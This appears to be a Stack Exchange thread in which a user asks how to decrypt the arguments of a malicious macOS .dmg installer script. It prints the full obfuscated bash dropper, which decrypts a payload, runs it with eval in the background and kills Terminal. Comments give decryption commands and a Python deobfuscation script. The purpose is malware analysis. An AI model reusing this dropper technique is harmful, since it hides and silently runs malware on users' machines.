I stumbled upon some kind of malicious .DMG package. I have seen people bringing this modus operandi up, but I would like to know how to decrypt the arguments within the script code.

I have tried all imaginable possibilities with openssl and have just, presumably, had success finding the decoded base64, but still encrypted, string of args. Can someone help me find a way to decrypt it?

Thank you in advance.

The .dmg contains 2 files:

File 1) install.command content:

```bash
#!/bin/bash
# Single-letter variables that later spell out the openssl command word by word.
G="a";F="c";Q="d";H="e";V="l";Z="m";X="n";T="o";J="p";K="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
# Pick the first file next to this script that is not a .command file; its name is the decryption password.
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX1/MUy+BnVes66qUAHeVLtB+EBV6jvLDEpgJ6RbBaZvgH3gq8EE75t4voue4ozCwYUC6/2B+g2oKKVah4UzxtR+BcCiO/tOqHyqgzIO1hsBwYKNJRYLm0YFnYB2nbJnUpaS6cPBIR8r9H5cFeHL1jaE9ZebSu0V2K1NJjpdoJ7tgbeS7LGpFrVDEzXjR92nwX7eJCQMGYhOIMx+DeN5yBXwpPD59BnypLtqORX2AVmecDHlAPOKBGuXKdiOEJss6I59D0NiHX5Mm1jVCtQq5Wim9SJk5lw2WC3GWzGYxHQRdvBTfzc7M7+Ki'
# Expands to: openssl enc -aes-256-cbc -d -A -base64 -pass "pass:$archive"
decryptedFommand="$(echo -e "$commandArgs" | ${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -${G}${H}${K}-256-cbc -${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive")"
# Run the decrypted command detached from the terminal, then close Terminal.
nohup /bin/bash -c "eval \"$decryptedFommand\"" >/dev/null 2>&1 &
killall Terminal #
```

File 2) A second file called Z0kKERs3XQ, which basically contains a massive, seemingly encrypted string.

My question is: how can I decrypt the "commandArgs" variable, knowing Z0kKERs3XQ is the key/password or whatever?

jaymzleutz
  • Almost certainly a malware installer, looks very similar to [this example](https://stackoverflow.com/questions/62005699/how-harmful-is-this-command/62012152#62012152) except for a different filename/decrypt key and different variable names. See the comments there for decrypt instructions (just replace the filename/key with yours). – Gordon Davisson Jun 06 '20 at 19:18
  • Thank you for your support. I followed all the instructions, changing the actual pathnames and filenames, and got an error alert: "bad decrypt 4624078272:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:crypto/evp/evp_enc.c:570". I noticed that an output file was successfully created, but don't know what that error message could possibly mean for the integrity of the output file. Any insights? Thank you again. – jaymzleutz Jun 06 '20 at 21:46
  • I’d have to get copies of the files to get a better idea what’s going on. Where did you find this disk image? – Gordon Davisson Jun 06 '20 at 22:13
  • I found this link. That's pretty much the same files inside the dmg package: https://macgamez-download.com/2018/04/neverwinter-nights-enhanced-edition-macosx-activated-torrent-uploaded-uptobox/ By the way, although I am pretty sure this is subject for a whole new thread, is there any way to convert the decrypted binary file to some "human" readable text, even if in a low-level language/source code? Thank you for your patience, man. – jaymzleutz Jun 06 '20 at 22:48
  • Got the file; thanks. Try this command to decrypt it: `openssl enc -aes-256-cbc -d -A -base64 -k "Z0kKERs3XQ" -in "/Volumes/Install/.hidden/Z0kKERs3XQ" -out ~/Desktop/decrypted-malware-binary`. As for figuring out what the binary does: that's probably a few orders of magnitude harder than figuring out the shell script. Reverse-engineering isn't a separate question, it's a [whole different stackexchange site](https://reverseengineering.stackexchange.com). – Gordon Davisson Jun 07 '20 at 03:03
  • Thank you for all your awesome support, @GordonDavisson. – jaymzleutz Jun 07 '20 at 23:16
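As an added example that is not part of the question or the comments, the following Python script statically deobfuscates the install.command above (resolving the ${X} letter variables into the real openssl call), splits the commandArgs blob into its salt and ciphertext, and reproduces the key derivation openssl applies to a `-pass` password; it assumes, as the comments do, that the second file's name Z0kKERs3XQ is the password, and it executes nothing from the package.

```python
"""Static analysis of the install.command above (added example, not from the
thread): resolve the ${X} letter substitutions to see the real openssl call,
then split the commandArgs blob into salt and ciphertext without running it."""
import base64
import hashlib
import re

# Letter table copied from the posted script.
LETTERS = {"G": "a", "F": "c", "Q": "d", "H": "e", "V": "l",
           "Z": "m", "X": "n", "T": "o", "J": "p", "K": "s"}

# The command after the pipe, exactly as written in the script.
TEMPLATE = ('${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -${G}${H}${K}-256-cbc '
            '-${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive"')

# The commandArgs value from the script (base64 of an `openssl enc` blob).
COMMAND_ARGS = (
    "U2FsdGVkX1/MUy+BnVes66qUAHeVLtB+EBV6jvLDEpgJ6RbBaZvgH3gq8EE75t4voue4ozCw"
    "YUC6/2B+g2oKKVah4UzxtR+BcCiO/tOqHyqgzIO1hsBwYKNJRYLm0YFnYB2nbJnUpaS6cPBI"
    "R8r9H5cFeHL1jaE9ZebSu0V2K1NJjpdoJ7tgbeS7LGpFrVDEzXjR92nwX7eJCQMGYhOIMx+D"
    "eN5yBXwpPD59BnypLtqORX2AVmecDHlAPOKBGuXKdiOEJss6I59D0NiHX5Mm1jVCtQq5Wim9"
    "SJk5lw2WC3GWzGYxHQRdvBTfzc7M7+Ki")

def resolve_command(archive_name):
    """Substitute ${X} letters and $archive to recover the real command."""
    cmd = re.sub(r"\$\{([A-Z])\}", lambda m: LETTERS[m.group(1)], TEMPLATE)
    return cmd.replace("$archive", archive_name)

def parse_salted(b64_blob):
    """Split an `openssl enc` password-mode blob: 'Salted__' + 8-byte salt + body."""
    raw = base64.b64decode(b64_blob)
    if raw[:8] != b"Salted__":
        raise ValueError("not an openssl enc salted blob")
    salt, body = raw[8:16], raw[16:]
    if len(body) % 16:
        raise ValueError("ciphertext is not a whole number of AES blocks")
    return salt, body

def evp_bytes_to_key(password, salt, key_len=32, iv_len=16, digest="md5"):
    """OpenSSL's EVP_BytesToKey (one iteration), the KDF behind `-pass`.
    `openssl enc` defaults to md5 before 1.1.0 and sha256 from 1.1.0 on, so
    a mismatched default digest is one cause of 'bad decrypt'."""
    out, prev = b"", b""
    while len(out) < key_len + iv_len:
        prev = hashlib.new(digest, prev + password + salt).digest()
        out += prev
    return out[:key_len], out[key_len:key_len + iv_len]
```

If `openssl enc -d` reports "bad decrypt" with the right password, re-run it with the digest the encrypting side used (`-md md5` or `-md sha256`); the key and IV this function derives differ between the two.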

0 Answers